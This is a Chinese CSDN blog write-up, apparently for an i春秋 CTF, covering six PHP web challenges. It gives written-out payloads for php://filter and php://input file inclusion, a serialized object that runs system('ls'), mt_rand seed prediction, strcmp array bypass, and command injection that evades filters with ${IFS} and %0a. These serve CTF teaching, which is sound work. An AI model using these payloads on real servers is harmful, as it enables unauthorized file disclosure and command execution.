夺旗赛满屏的php代码,i春秋ctf夺旗赛(第四季)writeup——web

本文详细介绍了六个Web安全挑战的解题步骤和思路,涉及PHP伪协议、文件包含漏洞、代码审计、命令注入等技术。通过F12查看源码、构造payload、代码审计来解决各个题目,强调了熟悉PHP脚本和Python脚本编写能力的重要性。
摘要由CSDN通过智能技术生成

前言:

这次的比赛一共有六道web题,接下我会详细介绍解题的步骤以及思路,以便让小白和没有接触过这类题型的小伙伴们能读懂。

第一题,nani

1、打开网页啥都没有,内容一片空白啥。这时候我们应该按F12去查看网页源码。往往很多提示和关键性信息都藏在这里。如图所示:

af1e850d1e22

在这里插入图片描述

2、得到提示:./index.php?file=show.php ;看到关键字file,下意识想会不会存在文件包含呢?不急,我们先去访问一下这个链接。如图所示:

af1e850d1e22

在这里插入图片描述

3、得知user.php的提示,我们接着再去访问user.php会发现又得到空白页面。不急,我们回头研究一下./index.php?file=show.php,检测是否存在文件包含漏洞。

构造一下payload:

/index.php?file=php://filter/read=convert.base64-encode/resource=user.php

af1e850d1e22

在这里插入图片描述

4、成功返回了base64加密后user.php的源代码,说明思路是正确的,我们继续往下走。

base64解密后得到如下代码:

af1e850d1e22

在这里插入图片描述

5、开始代码审计,主要有两个要注意的地方,wakeup()函数和unserialize()函数。之所以关注他们,是因为这两个函数在一起容易引发__wakeup()函数漏洞。构造payload:cmd=O:7:“convent”:3:{s:4:“warn”;s:13:“system(“ls”);”;}

解释一下payload吧:

传入的参数是cmd,是post类型的;

O:后面的数字7表示类"convent"的长度

3:表示的是错误的变量的数量

s: 表示的是字符串的长度

6、在hackbar执行构造好的payload:

af1e850d1e22

在这里插入图片描述

7、成功执行了ls命令,返回了目录信息。所以我们用同样的方法构造payload得到flag

af1e850d1e22

在这里插入图片描述

第二题,random

af1e850d1e22

在这里插入图片描述

1、代码审计后,可以知道代码可以传入三个参数:hello,seed,key;

hello参数作用:调用文件flag.php;

seed参数的作用:为mt_scrand()函数选定种子。种子确定了,mt_rand()就可以生成相应的随机数了。

key参数作用:传入的值要等于mt_rand()生成后的随机数。

2、可以利用php伪随机数漏洞,我们通过如下编写脚本:

af1e850d1e22

在这里插入图片描述

3、通过这几行代码就可以把我们选定的种子数(123456)对应的随机数打印出来,然后就可以构造我们payload了。(提醒一下小白,php文件可以放到我们的虚拟机的靶机服务器,然后去访问它就会输出结果了。。。)

4、访问网页得到:1863022934

af1e850d1e22

在这里插入图片描述

5、构造payload:/?hello=file(‘flag.php’)&seed=123456&key=1863022934

得到flag:

af1e850d1e22

在这里插入图片描述

第三题,admin

af1e850d1e22

在这里插入图片描述

1、网页显示的内容说我们不是管理员,打开F12查看源码:

af1e850d1e22

在这里插入图片描述

2、我们代码审计一下这段代码的意思:

$user = $_GET["user"];

$file = $_GET["file"];

$pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="admin")){

echo "hello admin!
";

include($file); //class.php

}

else{

echo "you are not admin ! ";

}

isset()函数:就是判断变量是否存在并且不为空,存在返回ture,不存在返回false。

file_get_contents() 函数:是用于将文件的内容读入到一个字符串中的首选方法。

include($file); //class.php:

3、意思是让我们输出hello admin!,然后执行文件包含漏洞。

所以,我们应该想办法让file_get_contents($user,‘r’)的内容变成admin就可以绕过file_get_contents,这里用的方法是使用php的封装协议—— php://input。php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。

4、构造payload:/?User=php://input

af1e850d1e22

在这里插入图片描述

5、成功绕过后我们利用伪协议php://filter把class.php文件读出来

af1e850d1e22

在这里插入图片描述

class.php:

error_reporting(E_ALL & ~E_NOTICE);

class Read{//fffffflag.php

public $file;

public function __toString(){

if(isset($this->file)){

echo file_get_contents($this->file);

}

return "Awwwwwwwwwww man";

}

}

?>

6、代码审计:

暗示我们存在fffffflag.php ;__toString()函数:将Flag类作为字符串执行时会自动执行此函数,并且将变量$file作为文件名输出文件内容,也就是说存在文件包含漏洞;虽然定义了类Read可是在这里显然没有去调用它,而且还有一个变量pass没使用过。因此,猜测第一网页的源码可能有信息。

同理,构造payload返回index.php

af1e850d1e22

在这里插入图片描述

index.php:

error_reporting(E_ALL & ~E_NOTICE);

$user = $_GET["user"];

$file = $_GET["file"];

$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="admin")){

echo "hello admin!
";

if(preg_match("/fffffflag/",$file)){

exit();

}else{

include($file); //class.php

$pass = unserialize($pass);

echo $pass;

}

}else{

echo "you are not admin ! ";

echo "
";

echo "hava a rest and then change your choose.";

}

?>

7、代码审计:

preg_match("/fffffflag/",

math?formula=file)%EF%BC%9A%E5%AF%B9file%E8%BF%9B%E8%A1%8C%E6%AD%A3%E5%88%99%E5%8C%B9%E9%85%8D%EF%BC%9B pass = unserialize($pass);:这里对pass进行了反序列化处理;

那可以构造反序列化让它输出pass,利用伪协议php://filter 读取fffffflag.php的内容。

af1e850d1e22

在这里插入图片描述

得到:flag{woyebuzhidaoyaononggeshaflagheshia}

第四题,post1

af1e850d1e22

在这里插入图片描述

1、查看源码得到:eval(system($c));//read flag.txt But no cat!!!

意思是存在flag.txt

2、题目说post[a],那我们post提交a试试:

af1e850d1e22

在这里插入图片描述

3、看来方向是对的,因为至少它页面的东西变了。那应该怎么构造才会读取到文件呢?eval(system());成为了我们突破口,system()允许我们使用命令,再根据“no cat”提示,用到的命令很可能是cut。所以构造payload:a=cut${IFS}-b1-${IFS}flag.txt

解释一下:

原本是:a=cut -b1- flag.txt

但是这里过滤空格啦,所以用$ {IFS }代替空格就完事了。

cut -b1 flag.txt 只会返回整个文本的第一个字符串f,所以加 - 是为了可以遍历全部的内容

af1e850d1e22

在这里插入图片描述

第五题,ping

1、直接查看网页源代码:

af1e850d1e22

在这里插入图片描述

2、代码审计:

strcmp ():进行二进制安全字符串比较,用来判断password是否一致

include($_REQUEST[‘path’]):文件包含,传入的参数是path

意思是我们要绕过strcmp (),然后再执行文件包含读ping.php这个文件。

3、Php5.3之后版本使用strcmp比较一个字符串和数组的话,将不再返回-1而是返回0。所以构造如下:

af1e850d1e22

在这里插入图片描述

4、利用伪协议php://filter读取ping.php

af1e850d1e22

在这里插入图片描述

ping.php源码:

af1e850d1e22

在这里插入图片描述

5、、审计代码后,我们知道对基本的命令分隔符进行了过滤。但是我们还可以使用 %0a符号–换行符;%0d符号–回车符

af1e850d1e22

在这里插入图片描述

6、命令:cat ./ffffff1111aagggg.txt,读取flag

第六题,post2

1、基于post1进行改进,刚开始做题的时候可绕了因为exec没有回显,要用到时间盲注。后来看到大佬写的脚本才恍然大悟,利用大佬给出的脚本:

af1e850d1e22

在这里插入图片描述

af1e850d1e22

在这里插入图片描述

End:

其实这次比赛的web题,考察最多就是php伪协议,用到最多的技能就是代码审计的能力和编写脚本的能力。所以要熟悉php脚本语言,以及提高python代码编写的能力。不断积累题型,才能玩得越来越好。

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值